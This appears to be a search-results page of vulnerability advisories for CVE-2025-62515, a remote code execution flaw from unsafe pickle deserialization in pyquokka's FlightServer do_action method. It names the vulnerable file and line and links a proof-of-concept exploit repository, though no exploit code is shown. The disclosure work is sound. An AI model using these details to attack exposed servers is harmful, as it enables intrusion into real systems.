12 matches found
Remote Code Execution (RCE)
pyquokka is vulnerable to Remote Code Execution RCE. The vulnerability is due to unsafe deserialization using pickle.loads on untrusted input without validation, which allows an attacker to execute arbitrary code by sending malicious payloads...
CVE-2025-62515
pyquokka is a framework for making data lakes work for time series. In versions 0.3.1 and prior, the FlightServer class directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation in the doaction method. The vulnerable code is locate...
Exploit for CVE-2025-62515
pyquokka-rce-poc !GitHub starshttps://img.shields.io/gith...
Deserialization of Untrusted Data
Overview pyquokka is a Quokka Affected versions of this package are vulnerable to Deserialization of Untrusted Data via the doaction function in the flight.py file. An attacker can execute arbitrary code on the server by sending maliciously crafted serialized data through the network interface...
CVE-2025-62515
pyquokka is a framework for making data lakes work for time series. In versions 0.3.1 and prior, the FlightServer class directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation in the doaction method. The vulnerable code is locate...
CVE-2025-62515 Remote Code Execution by Pickle Deserialization via FlightServer in pyquokka
pyquokka is a framework for making data lakes work for time series. In versions 0.3.1 and prior, the FlightServer class directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation in the doaction method. The vulnerable code is locate...
CVE-2025-62515 Remote Code Execution by Pickle Deserialization via FlightServer in pyquokka
pyquokka is a framework for making data lakes work for time series. In versions 0.3.1 and prior, the FlightServer class directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation in the doaction method. The vulnerable code is locate...
CVE-2025-62515 Remote Code Execution by Pickle Deserialization via FlightServer in pyquokka
pyquokka is a framework for making data lakes work for time series. In versions 0.3.1 and prior, the FlightServer class directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation in the doaction method. The vulnerable code is locate...
CVE-2025-62515
CVE-2025-62515 affects pyquokka ≤ 0.3.1. The FlightServer’s do_action() deserializes untrusted data with Python’s unsafe pickle.loads(), specifically in pyquokka/flight.py around line 283, enabling arbitrary remote code execution when the server is exposed (e.g., binding to 0.0.0.0) and handling ...
GHSA-F74J-GFFQ-VM9P pyquokka is Vulnerable to Remote Code Execution by Pickle Deserialization via FlightServer
Description In the FlightServer class of the pyquokka framework, the doaction method directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation, which results in a remote code execution vulnerability. The vulnerable code is located...
pyquokka is Vulnerable to Remote Code Execution by Pickle Deserialization via FlightServer
Description In the FlightServer class of the pyquokka framework, the doaction method directly uses pickle.loads to deserialize action bodies received from Flight clients without any sanitization or validation, which results in a remote code execution vulnerability. The vulnerable code is located...
EUVD-2025-34900
pyquokka is Vulnerable to Remote Code Execution by Pickle Deserialization via FlightServer...